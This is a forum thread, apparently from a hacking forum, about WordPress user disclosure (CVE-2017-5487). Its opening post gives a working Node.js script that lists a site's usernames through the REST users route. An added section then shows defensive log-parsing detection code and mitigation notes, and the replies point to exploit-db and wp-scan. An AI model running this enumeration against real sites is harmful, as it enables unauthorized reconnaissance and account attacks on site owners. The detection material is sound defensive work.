WordPress User Disclosure (CVE-2017-5487)
by concac - Friday June 16, 2023 at 08:48 PM
#1
Hi Guys, I will share some good things about this vulnerability

Reveal WordPress accounts via /wp-json/wp/v2/users/ using JavaScript to dump the account name and post name

The disclosure of sensitive information in CVE-2017-5487

wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1 allows remote attackers to obtain sensitive information through a request to wp-json/wp/v2/users.

Vulnerability level: 5.3 MEDIUM

Here is the result

https://www12.0zz0.com/2023/06/16/20/903122173.png

How to use?

Run the following command to install the Axios library:
npm install axios

If you don't have npm, install it from here: https://nodejs.org/en

Then run the script:
node file.js

const axios = require('axios');

const url = "";  // Base URL of the WordPress site goes here (left empty in the original post)
const payload = "/wp-json/wp/v2/users/";  // REST route that lists users

axios.get(url + payload)
    .then(response => {
        const users = response.data;  // JSON array of user objects
        if (users.length > 0) {
            console.log("*-----------------------------*");
            users.forEach(user => {
                // The original post had literal line breaks inside these string
                // literals (a syntax error); "\n" is the intended escape.
                console.log("\n[*]ID  : " + user.id);
                console.log("\n[*]Name : " + user.name);
                console.log("\n[*]User : " + user.slug);
                console.log("\n[*]Url : " + user.url);
                console.log("");
            });
            console.log("*-----------------------------*");
        } else {
            console.log("\n[*]No user");
        }
    })
    .catch(error => {
        console.error(error);
    });


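From the defender's side, the requests the script above makes leave a clear trace in the web server's access log. The following is an added example, not code from the thread: it parses access-log lines in the common combined format, flags requests that address the wp/v2/users route (both the /wp-json/wp/v2/users form used above and the ?rest_route=/wp/v2/users form WordPress also accepts), and summarises them per client address, noting whether any request got a 200 and so actually disclosed the listing. The log lines, client addresses and user agents are constructed sample data.

```javascript
// Added example, not part of the thread's script: detection logic that scans
// web-server access-log lines (combined log format) for WordPress REST user
// listings such as the /wp-json/wp/v2/users/ requests made by the post above.
// All log lines below are constructed sample data.

const SAMPLE_LOG = [
  '203.0.113.7 - - [16/Jun/2023:20:48:01 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1843 "-" "axios/1.4.0"',
  '203.0.113.7 - - [16/Jun/2023:20:48:02 +0000] "GET /wp-json/wp/v2/users/1 HTTP/1.1" 200 412 "-" "axios/1.4.0"',
  '198.51.100.3 - - [16/Jun/2023:20:49:10 +0000] "GET /?rest_route=/wp/v2/users&per_page=100 HTTP/1.1" 200 2210 "-" "curl/8.1.2"',
  '192.0.2.9 - - [16/Jun/2023:20:50:00 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 9120 "https://example.org/" "Mozilla/5.0"',
  '192.0.2.9 - - [16/Jun/2023:20:50:05 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 401 84 "-" "Mozilla/5.0"',
];

// Combined log format:
// client ident user [time] "method target protocol" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// Returns a structured request record, or null for lines that do not parse.
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  // Resolve the request target against a dummy origin so URL splits path and query.
  const target = new URL(m[4], 'http://log.invalid');
  return {
    ip: m[1],
    time: m[2],
    method: m[3],
    path: target.pathname,
    query: target.searchParams,
    status: Number(m[5]),
    userAgent: m[8],
  };
}

// True when the request addresses the wp/v2/users route, either through the
// pretty-permalink form (/wp-json/wp/v2/users...) or through the
// ?rest_route=/wp/v2/users form that WordPress also accepts.
function isUserEnumeration(req) {
  if (req.path.startsWith('/wp-json/wp/v2/users')) return true;
  const route = req.query.get('rest_route');
  return route !== null && route.startsWith('/wp/v2/users');
}

// Groups matching requests per client address and records whether any of them
// returned 200, i.e. whether a user listing was actually disclosed.
function summarizeEnumeration(lines) {
  const byIp = {};
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req || !isUserEnumeration(req)) continue;
    const entry = byIp[req.ip] ||
      (byIp[req.ip] = { requests: 0, disclosed: false, userAgents: new Set() });
    entry.requests += 1;
    if (req.status === 200) entry.disclosed = true;
    entry.userAgents.add(req.userAgent);
  }
  return byIp;
}

// Stand-alone run: one line per client that touched the users route.
for (const [ip, e] of Object.entries(summarizeEnumeration(SAMPLE_LOG))) {
  console.log(`${ip}: ${e.requests} user-route request(s), disclosed=${e.disclosed}, ` +
              `agents=${[...e.userAgents].join(', ')}`);
}
```

Unauthenticated requests that come back 401 or 403 (the last sample line) still show that someone probed the route, which is why the summary keeps them and only uses the status to decide whether disclosure happened. On the server side the usual mitigation, besides running a patched WordPress, is to restrict the wp/v2/users route to authenticated users, which is what makes the 401 outcome in the sample possible.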
#2
https://www.exploit-db.com/exploits/41497
#3
old shit
#4
this is old and you can just use wp-scan
#5
(Jun 23, 2023, 08:10 PM)Mister-Kitty Wrote: this is old and you can just use wp-scan

There are quite a few old versions; I want to share with those who don't know.

#6
thanks for zero day